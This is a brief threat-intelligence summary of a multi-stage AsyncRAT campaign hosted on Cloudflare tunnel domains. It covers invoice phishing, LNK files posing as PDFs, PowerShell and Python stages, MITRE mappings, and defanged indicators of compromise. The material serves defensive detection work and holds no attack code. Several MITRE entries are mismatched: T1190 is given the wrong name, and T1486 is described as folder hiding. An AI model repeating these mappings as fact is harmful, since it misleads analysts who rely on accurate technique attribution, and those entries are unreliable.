This report details the monitoring of a malicious infrastructure named “Cloudflare tunnel infrastructure,” utilized to deliver remote access trojans (RATs) like AsyncRAT, indicating a robust and complex multi-step infection chain. Notable phishing tactics and evasion strategies employed by attackers, including malicious email attachments, LNK files, and obfuscation through Python scripts, are thoroughly examined. Affected: Cybersecurity, Digital Infrastructure, Corporate Systems
Keypoints :
- The “Cloudflare tunnel infrastructure” is used by actors to host malicious files and deliver RATs.
- The infection chain was operational since February 2024 with complex strategies and multiple steps.
- Phishing emails, often disguised as invoices, serve as the primary initial access vector.
- Malicious LNK files are disguised as PDF shortcuts to bypass detection.
- The report emphasizes the importance of monitoring for suspicious email attachments and provides a Sigma detection rule.
- Execution involves various steps with obfuscation, including the use of PowerShell and Python for installing dependencies.
- The report emphasizes improving detection capabilities through Cyber Threat Intelligence (CTI) and tailored Sigma rules.
MITRE Techniques :
- Phishing (T1566): Distribution of phishing emails disguised as invoices to deceive recipients.
- Application Layer Protocol (T1190): Use of malicious LNK files to exploit Windows system behaviors.
- Execution via Command-Line Interface (T1059): Use of PowerShell to download and execute further payloads.
- Remote File Copy (T1105): Downloading additional files from compromised remote resources.
- Data Encrypted for Impact (T1486): Evasion technique using the ‘attrib’ command to hide installation folders.
Indicator of Compromise :
- [Domain] malawi-light-pill-bolt[.]trycloudflare[.]com
- [Domain] players-time-corresponding-th[.]trycloudflare[.]com
- [Domain] spaces-corner-notices-battery[.]trycloudflare[.]com
- [Domain] xi-if-grows-valued[.]trycloudflare[.]com
- [Domain] phvnmarch8787[.]duckdns[.]org
- [Hash – SHA-256] 0d8d46ec44e737e6ef6cd7df8edf95d83807e84be825ef76089307b399a6bcbb (mslibrary attachment)
Full Story: https://blog.sekoia.io/detecting-multi-stage-infection-chains-madness/